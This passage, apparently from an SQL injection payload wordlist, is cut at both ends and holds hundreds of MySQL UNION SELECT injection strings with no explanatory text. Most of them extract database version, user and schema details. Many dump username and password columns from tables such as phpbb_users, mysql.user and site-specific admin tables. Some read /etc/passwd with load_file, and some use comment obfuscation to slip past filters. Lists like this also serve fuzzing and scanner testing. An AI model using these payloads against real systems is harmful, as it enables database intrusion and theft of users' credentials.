users/* -1 union select 1,2,concat(username,char(58),user_password),4,5 from phpbb_users limit 1,1/* -1 union select 1,2,concat(username,char(58),user_password) from forum_users/* -1 union select 1,2,concat(version(),0x20,database(),0x20,user()),4,5,6,7,8,9-- -1' union select 1,2,concat(version(),0x2F,database(),0x2F,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52/* -1 union select 1,2,concat(version(),0x3a3a,user(),0x3a3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,16/* -1 union select 1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9/* -1 union select 1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66/* 1 union select 1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10,11,12 limit 1,1/* -1 union select 1,2,concat(Version(),0x3a,USER(),0x3a,DATABASE()),4,5,6,7/* 1 UNION SELECT 1,2,concat(Version(),0x3a,USER( ),0x3a,DATABASE()),4,5,6,7,8/* 1 union select 1,2,concat(version(),0x3b,user(),0x3b,database()),4,5-- -1' union select 1,2,concat(version(),0x3,user(),0x3,database()),4/* -1 union select 1,2,concat(version(),char(13),user(),char(13),database()),4,5,6,7/* 1 union select 1,2,concat(version(),char(58),user(),char(58),database()) -1 union select 1,2,concat(version(),char(58),user(),char(58),database()),4,5,6,7,8,9,10 /* -1 union select 1,2,concat(version(),user(),database()),4,5,6/* -1 union select 1,2,concat_ws(0x0b,version(),concat(user(),0x3a3a,file_priv),database(),@@version_compile_os,load_file(0x2F6574632F706173737764)),4 from mysql.user-- 1 union select 1,2,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),4,5,group_concat(0x0b,column_name),7 from information_schema.columns where table_name=0x62726F6D6C65797461626C65-- -1 union select 1,2,concat_ws(0x10,pwd,uid),4,5 from user/* 1 union select 1,2,concat_ws(0x20203a3a2020,user(),version(),database()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 -1 union select 1,2,concat_ws(0x203a20,version(),user(),host,user,password,file_priv),4,5 from mysql.user-- -1 union select 1,2,concat_ws(0x20,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17-- -1 union select 1,2,concat_ws(0x20,version(),user(),database()),4,5,6,7 from news 1 union select 1,2,concat_ws(0x2a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 limit 1,1 1 union select 1,2,concat_ws(0x2a,version(),user(),database()),4,5,6,7,8 limit 1,1 -1 union select 1,2,concat_ws(0x2F,cast(version() as binary),cast(database() as binary),cast(user() as binary)),4,5/* -1 union select 1,2,concat_ws(0x2F,name,password),version(),5,6,7,8,9,10,11 from user limit 3,3/* -1 union select 1,2,concat_ws(0x2F,version(),database(),user())/* -1 union select 1,2,concat_ws(0x2F,version(),database(),user()),4/* -1 union select 1,2,concat_ws(0x2F,version(),database(),user()),4,5,6/* -1 union select 1,2,concat_ws(0x2F,version(),database(),user()),4,5,6,7,8/* -1 union select 1,2,concat_ws(0x2F,version(),database(),user()),4,5,6,7,8,9/* -1' union select 1,2,concat_ws(0x2F,version(),database(),user()),4,5,6,7,8,9/* -1 union select 1,2,concat_ws(0x2F,version(),database(),user()),4,5,6,7,8,9,10/* -1' union select 1,2,concat_ws(0x2F,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/* 1 union select 1,2,concat_ws(0x3a,0x3c2f7469746c653e,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 1 union select 1,2,concat_ws(0x3a2a3a,version(),database(),user(),@@version_compile_os),4,5-- -1 union select 1,2,concat_ws(0x3a3a3a,version(),database(),user())-- -1 union select 1,2,concat_ws(0x3a3a,aid,pwd),4,5,6,7,8,9 from mpn_authors -- -1 union select 1,2,concat_ws(0x3a3a,email,pass,nivelPermiso),4,5,6,7,8 from usuarios limit 0,1/* -1 union select 1,2,concat_ws(0x3a3a,email,usname,uspasswd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from users -- -1 uNioN sEleCT 1,2,concat_ws(0x3a3a,id,name,password,priority),4,5,6,7,8,9 fRom msf_admins -- -1 union select 1,2,concat_Ws(0x3a3a,id,passwd,LEVEL,lastseen),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from users -- -1' union select 1,2,concat_ws(0x3a3a,id,username,password,email,type),4,5,6,7,8,9,10,11,12,13 from users limit 1,100 -- -1 union select 1,2,concat_ws(0x3a3a,login,passwd),4,5,6,7,8,9,10 from admin_users limit 0,1/* -1 union select 1,2,concat_ws(0x3a3a,nome,Senha,email),4,5,6,7,8,9,10,11 from usuario limit 0,1 1 union select 1,2,concat_ws(0x3a3a,TABLE_NAME),4,5 from information_schema.tables limit 25,2/* -1 union select 1,2,concat_ws(0x3a3a,uname,confirmkey),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 from signup limit 21,1-- -1' union select 1,2,concat_Ws(0x3a3a,usergroup,username,password,name,mail,publications,hide_mail,homepage,icq,location,lj_username,lj_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from cute_users /* 1 union select 1,2,concat_Ws(0x3a3a,userid,username,userpass,email),4,5 from gc_cardusers-- -1 union select 1,2,concat_ws(0x3a3a,username,password,email,admin,passkey),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from user limit 26,1-- -1' union select 1,2,concat_ws(0x3a3a,username,password,usertype),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45 from user_validate limit 4,1 -- -1 union select 1,2,concat_ws(0x3a3a,version(),user(),database()),4,5,6,7,8,9/* -1 union select 1,2,concat_ws(0x3a3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13 -- -1 union select 1,2,concat_ws(0x3a,account_username,account_password),4,5,6,7,8,9 from tbl_account/* -1 union select 1,2,concat_ws(0x3a,admin,password),4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),6,7,8,9,10,11,12,13,14,15,16,17,18 from webuser -- -1 union select 1,2,concat_Ws(0x3a,database(),user(),version()),4-- -1 union select 1,2,concat_ws(0x3a,database(),user(),version()),4,5,6 -- -1 union select 1,2,concat_ws(0x3a,database(),user(),version()),4,5,6,7,8,9-- -1' union select 1,2,concat_ws(0x3a,database(),user(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* -1 union select 1,2,concat_ws(0x3a,database(),version(),user())-- -1 union select 1,2,concat_ws(0x3a,email,login,password,pages,info),4,5 from page_users limit 0,1/* -1 union select 1,2,concat_ws(0x3a,id,first_name,surname,login,password,active,email),4,5,6,7 from users limit 1,1-- -1 union select 1,2,concat_ws(0x3a,id,login,password),4,5,6,7,8 from users -- -1 union select 1,2,concat_ws(0x3a,id,pwd,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from users-- -1 Union Select 1,2,concat_ws(0x3a,login,passw),4 from ts_user -- 1 union select 1,2,concat_ws(0x3a,login,password,email),4,5,6,7,8,9,10,11,12,13 from cezar.aadm_users-- -1 union select 1,2,concat_ws(0x3a,login,pwd),4,5 from aut_users limit 2,1/* -1 union select 1,2,concat_ws(0x3a,login_utilisateur,pwd_utilisateur),4,5 from utilisateur-- -1 union select 1,2,concat_ws(0x3a,name,email) from users/* -1 union select 1,2,concat_ws(0x3a,name,password,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from users/* -1 union select 1,2,concat_ws(0x3a,name,passwort,email),4 from users-- -1 union select 1,2,concat_ws(0x3a,nick,password,email),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 from usuarios limit 0,1/* -1 union select 1,2,concat_WS(0x3a,password,login),4,5,6 from user-- 1 union select 1,2,concat_ws(0x3a,password,loginname),4,5,6,7 from users-- -1 union select 1,2,concat_ws(0x3a,table_name),4,5,6,7,8,9,10,11 from information_schema.tables limit 17,1-- -1 union select 1,2,concat_ws(0x3a,uid,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from tbl_admin -1 union select 1,2,concat_ws(0x3a,uname,pword),4,5 from users-- -1 union select 1,2,concat_ws(0x3a,user(),database(),version()) -1 union select 1,2,concat_ws(0x3a,user(),database(),version())-- -1 union select 1,2,concat_ws(0x3a,user(),database(),version())/* -1 UNION SELECt 1,2,concat_ws(0x3a,user(),database(),version()) -- -1) union select 1,2,concat_ws(0x3a,user(),database(),version()),4/* -1 union select 1,2,concat_Ws(0x3a,user(),database(),version()),4 -- -1 UNION SELECT 1,2,concat_ws(0x3a,user(),database(),version()),4 -1 UNION SELECT 1,2,concat_ws(0x3a,user(),database(),version()),4 -- -1 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5-- -1' union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5 -- -1' union select 1,2,concat_Ws(0x3a,user(),database(),version()),4,5/* -1 UNION SELECT 1,2,concat_ws(0x3a ,user(),database(),version()),4,5 -1 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6 -- -1 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6 -- -1 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7/* -1 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8-- -1 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8/* -1 union select 1,2,concat_ws(0x3a,user(),database() ,version()),4,5,6,7,8,9,10 -1 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10 -1 UNION SELECT 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11 -- -1 UNION SELECT 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13 -- -1' union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14/* -1 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15-- -1 UNION SELECT 1,2,concat_ws(0x3A,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16/* -1 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- -1 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* -1 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- -1 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 -1 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45 -- -1 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 -1 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57 1 union select 1,2,concat_Ws(0x3a,user(),database(),version()) from mysql.user-- -1 union select 1,2,concat_ws(0x3a,user(),database(),version(),@@version_compile_os),4,5,6 -- -1 union select 1,2,concat_ws(0x3a,user(),database(),version(),@@version_compile_os),4,5,6,7,8,9,10 -- -1 UNION SELECT 1,2,concat_ws(0x3A,userid,firstname,lastname,username,userpassword,lastloggedin,type),4,5 FROM productionwww.ADMIN LIMIT 0,1/* -1 union select 1,2,concat_ws(0x3a,user_id,nikname,lastname,firstname,secondname,email,login,password,register_time,status,type,register_id),4,5,6 from users-- -1' union select 1,2,concat_ws(0x3A,userid,usergroupid,username,password,email,salt),4,5 from user -- -1' union select 1,2,concat_ws(0x3a,user_id,username,user_password),4,5,6,7,8 from phpbb_users limit 1,1 -- -1 union select 1,2,concat_ws(0x3a,user_login,password,email,user_id),4,5,6,7,8,9 from members limit 0,1/* -1 union select 1,2,concat_ws(0x3a,user_login,user_password),4,5,6 from admin_users-- -1 UNION SELECT 1,2,concat_ws(0x3a,username,email,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17 FROM user limit 20000,1-- -1 union select 1,2,concat_ws(0x3a,username,passwd),4,5,6,7,8,9,10,11,12 from users-- -1 union select 1,2,concat_ws(0x3a,username,passwd,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from registered/* -1 union select 1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from users limit 0,1-- -1 union select 1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11 from alumnicollege.auth_user/* -1 union select 1,2,concat_ws(0x3a,username,password),4,5,6,7 from forum.forum_user-- -1 union select 1,2,concat_ws(0x3a,username,password),4,5,6 from admin_data-- -1 union select 1,2,concat_ws(0x3a,username,password) from users2-- -1 union select 1,2,concat_ws(0x3a,user_name,user_password),4,5,6 from fphotos_users limit 0,1-- -1 union select 1,2,concat_ws(0x3a,user,password),4,5,6,7,8 from mysql.user -- -1 union select 1,2,concat_ws(0x3a,user,password),4,5 from administrator-- -1' union select 1,2,concat_ws(0x3a,user,password),4,5 from mysql.user/* -1 union select 1,2,concat_ws(0x3a,user,password),4 from mysql.user/* -1 union select 1,2,concat_ws(0x3a,user,pwd),4,5,6,7,8,9,0,1,12 from login/* -1 union select 1,2,concat_ws(0x3a,user(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* -1' union select 1,2,concat_ws(0x3a,user(),version(),database())/* 1' union select 1,2,concat_ws(0x3a,user(),version(),database()),4,5 -- -1 union select 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6/* -1' union select 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6/* -1' union select 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7 -- -1' union select 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17/* -1' union select 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/* 1 UNION SELECT 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- 1' UNION SELECT 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/* -1 union select 1,2,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),4-- -1 union select 1,2,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),4,5-- -1 union select 1,2,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),4,5,6,7-- -1 union select 1,2,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),4,5,6,7,8,9,10,11-- -1 union select 1,2,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14-- -1 union select 1,2,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15-- 1 union select 1,2,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44 -1 union select 1,2,concat_ws(0x3a,usrLogin,usrPasswd),4,5 from tbuser limit 0,1/* 1 union select 1,2,concat_ws(0x3a,version(),database(),user()),4-- 1' union select 1,2,concat_ws(0x3a,version(),database(),user()),4/* -1 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5-- -1' union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6/* -1 union Select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6 -- -1 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7-- -1 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7/* 1' union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7/* -1 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8/* -1' union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8/* -1 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9/* -1 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10-- -1 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13 -- -1 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- -1 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- -1 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33-- -1 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71-- 1 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5 limit 1,1/* -1 union select 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9-- 1 union select 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10/* -1' union select 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10,11/* -1' union select 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13/* 1 union select 1,2,concat_ws(0x3A,version(),user(),database())-- -1 UNION SELECT 1,2,concat_ws(0x3a,VERSION(),USER(),DATABASE())/* -1 union select 1,2,concat_ws(0x3a,version(),user(),database()),4/* 1' union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5 -- 1' union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5/* -1 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7-- -1 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7, -1 UNION SELECT 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7 -- 1' union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12/* -1 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13/* -1 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15 -- -1 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16-- -1 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- -1' UNION SELECT 1,2,concat_ws(0x3a,VERSION(),USER(),DATABASE()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/* -1/**/union/**/select/**/1,2,concat_ws(0x3a,version(),user(),database()),5,4,6,7 -1 union select 1,2,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),4,5,6,7,8,9,10,11,12-- -1 union select 1,2,concat_ws(0x3a,version(),user(),@@version_compile_os) -- -1 union select 1,2,concat_ws(0x3b,version(),user(),database()),4,5,6-- -1 union select 1,2,concat_ws(0x3C62723E,0x3C62723E,VERSION(),DATABASE(),USER(),0x3C62723E),4/* -1 union select 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version())-- 1 union select 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(), version()),4,5,6,7-- -1 union select 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(), version()),4,group_concat(table_name),6,7 from information_schema.tables-- -1 union select 1,2,concat_ws(char(58),username,email,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from vendor_logins limit 0,1/* -1 union select 1,2,concat_ws(char(58),user(),version(),database())/* -1 union select 1,2,concat_ws(char(58),version(),user(),database(),@@version_compile_os),4,5 -- -1 union select 1,2,concat_ws(version(),0x3a,user,0x3a,database())-- -1 union select 1,2,concat_ws(version(),0x3a,user(),0x3a,database())-- -1 union select 1,2,concat_ws(version(),0x3a,user(),0x3a,database())/* -1 union select 1,2,concat_ws(version(),database(),user()),4,5,6-- -1' union select 1,2,convert(concat(user,0x3a,password) using cp1251),4,5,6,7 from mysql.user/* -1 union select 1,2,convert(concat(version(),char(58,58),database(),char(58,58),user()) using cp1251),4,5,6,7,8,9/* -1 UNION SELECT 1,2,convert(concat_ws(0x3A,admin_name,admin_password) using latin1),4,5,6 FROM admin LIMIT 0,1/* -1 UNION SELECT 1,2,convert(concat_ws(0x3a, user(), version(), database()) using cp1251),4,5,6,7,8,9,10,11,12,13,14/* -1' union select 1,2,convert(user() using cp1251),4 from users/* -1' UNION SELECT 1,2,convert(user() USING latin1),4,5,6/* -1 union select 1,2,convert(version() using latin1),4,5,6,7,8,9,10,11,12,13,14 -- -1' union select 1,2,convert(version() using latin1),4,5,6,7,8,9,10,11,12,13,14/* -1 union select 1,2,czas_zycia,4,5,6,7,8,concat_ws(user(),database(),version()),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from kosmetyczni_komunikaty/* -1 union select 1,2,database(),4,5,6,7/* 1 union select 1,2,database(),4,5,6,7,8,9,10,11/* 1' union select 1,2,DATABASE(),4,5,6,USER(),8,9,10,11,12/* 1 union select 1,2,database(),user(),5,6,7 -1 union select 1,2,database(),version(),5 -1 union select 1,2,database(),version(),5,6,7,8,concat(user,char(58),password),10 from mysql.user/* 1 UnIon SeLEct 1,2 from uneprod_tarificadordesarrollo.tblpymes_ciudades -- -1 union select 1,2,group_concat(0x0b,table_name),4,5,6,7 from information_schema.tables -- -1 union select 1,2,group_concat(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 -1 union select 1,2,group_concat(column_name),4,5,6 from information_schema where table_name like 0x61646d696e69737472617465757273 -- -1 union select 1,2,group_concat(concat_ws(0x3a,username,password,email)),4 from users-- -1 union select 1,2,group_concat(email,':',password),4,5 from users; -- -1 union select 1,2,group_concat(id,0x3a,username,0x3a,passwd),4,5,6,7,8,9,10,11,12,13 from users -1 union select 1,2,group_concat(login,0x3a,password),4,5,6,7,8,9,10,11 from cms_administrators-- -1 union select 1,2,group_concat(login,0x3a,password),4,5,6,7,8,9,10 from users -- -1 union select 1,2,group_concat(loginSEPARATOR0x3a),group_concat(PASSWORDSEPARATOR0x3a),5,6,7,8,9 from vsevidno.kernel_users -- 1 union select 1,2,group_concat(name,0x3a,password),4,5,6,7,8,9,10,11,12 from LUM_User -- -1 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10 from information_schema.tables-- -1 union select 1,2,group_concat(user_name,0x3a,user_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 from user -1 union select 1,2,group_concat(username,0x3a,user_password),4,5,6 from nuke_users -- -1 union select 1,2,group_concat(user_name,char(58),user_password),4,5 from admin_login -1 union select 1,2,load_file(0x2f6574632f706173737764),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49/* -1 union select 1,2,load_file(0x2f6574632f706173737764),4,5,6,7,8,9,10,11,12 from sedoi_users/* -1 union select 1,2,LOAD_FILE('/etc/passwd'),4,5,6,7,8,9,10/* -1 union select 1,2,LOAD_FILE('/etc/passwd'),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/* -1 union select 1,2,login,4,5,6,pass,8,9,10,11,12,13,14 FROM admins limit 0,1-- -1 union select 1,2,login,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from users limit 0,1 -1 union select 1,2,login,pass,5,6,7,8,9 from users limit 0,1/* -1 union select 1,2,login,password,5,6,7,8 from users limit 0,1 1' union select 1,2,login,password,5,6 from admin/* -1 union select 1,2,login,psw,5,6 from users where login='admin' -1 union select 1,2,login,user_password,5,6,7 from user/* -1 union select 1,2,name,4,5,passw,7,8 from users/* -1 union select 1,2,null,4,concat(user,char(58),password) from users limit 0,1/* -1 union select 1,2,pass,4,5,6,7,8,9,user,11,12,13,14,15,16 from user/* -1 union select 1,2,pass,4,5 FROM auth/* -1' union select 1,2,Password,4,5,6,7,8,9,10,11,12,13,14,15,16 from mysql.user -- -1 union select 1,2,password,4,5 from mysql.user limit 0,1/* 1 union select 1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from information_schema.tables limit 1,1 -1 UNION SELECT 1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 FROM information_schema.tables LIMIT 16,1/* -1 union select 1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from INFORMATION_SCHEMA.TABLES/* -1' union select 1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables/* -1 union select 1,2,table_name,4,5,6,7,8 from information_schema.tables limit 24,1/* -1 union select 1,2,TABLE_NAME,4,5,6,7 FROM INFORMATION_SCHEMA.TABLES/* -1 union select 1,2,table_name from information_schema.tables-- -1 union select 1,2,table_schema,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from information_schema.tables limit 16,1/* -1 union select 1,2,unhex(hex(concat(user,0x3a,password))),4,5 from mysql.user/* -1 union select 1,2,unhex(hex(concat_ws(0x3a,version(),database(),user()))),4,5,6,7,8,9,10,11,12,13,14/* -1 union select 1,2,unhex(hex(concat_ws(0x3a,version(),user(),0x3a,database()))),4,5,6/* -1 union select 1,2,unhex(hex(group_concat(column_name))),4,5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.columns where table_name=0x745f61646d696e-- -1 union select 1,2,unhex(hex(group_concat(concat_WS(0x3a,rus_login,rus_password)))),4,5,6,7,8,9,10,11,12,13,14,15 from msmo_registered_users-- 1) union select 1,2,unhex(hex(user()))-- -1 UNION SELECT 1,2,unhex(hex(version())),4,5,6,7,8,9,10,11,12,13,14,15,16,17/* -1' union select 1,2,user(),4-- 1' union select 1,2,USER(),4,5,6/* -1 union select 1,2,user(),4,5,6,7,8,9/* -1 union select 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15 -- -1 union select 1,2,user(),4,5,version(),7,8,9,10,11,12,13,14,database(),16/* -1 union select 1,2,user(),4,database(),version(),7,8,9,10,11,12,13-- -1 union select 1,2,user(),database(),5,6,7,8,version(),10-- 1 union select 1,2,user(),database(),5,6,7,version(),9,10,11,12,13/* -1 union select 1,2,user(),database(),5,6,version() -- -1 UNION SELECT 1,2,USER(),DATABASE(),5,VERSION(),7,8/* -1 union select 1,2,user_icq,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat(username,char(58),user_password) from www.phpbb_users limit 1,1/* 1 union select 1,2,username,4,5,6,7,8,8 from z102451_uventa.jv_users where id=1 -- -1 union select 1,2,username,password,id,6,7,8,9,10,11,12,13 from members/* -1 union select 1,2,username,user_password,5,6,7,8 from phpbb_users limit 4,1/* -1 union select 1,2,user_password,username,5,6 from users limit 1,1/* -1 union select 1,2,user(),version(),database(),6,7,8,9,10,11,12,13/* # not sql #-1 union select1,2,version()-- -1' union select 1,2,version() -- 1' union select 1,2,version(),3,4,5,6,7-- -1 union select 1,2,version(),4 -1' UNION SELECT 1,2,version(),4 -- -1 union select 1,2,version(),4,5-- -1'/**//*!union*//**//*!select*//**/1,2,version(),4,5/**/-- -1 union select 1,2,version(),4,5,6/* -1' union select 1,2,version(),4,5,6 -- -1' union select 1,2,version(),4,5,6-- 1' union select 1,2,version(),4,5,6/* -1 union select 1,2,version(),4,5,6,7/* -1' union select 1,2,@@version,4,5,6,7/* -1 union select 1,2,version(),4,5,6,7,8 -- -1 union select 1,2,version(),4,5,6,7,8,9/* 1 union select 1,2,version(),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41-- -1 union select 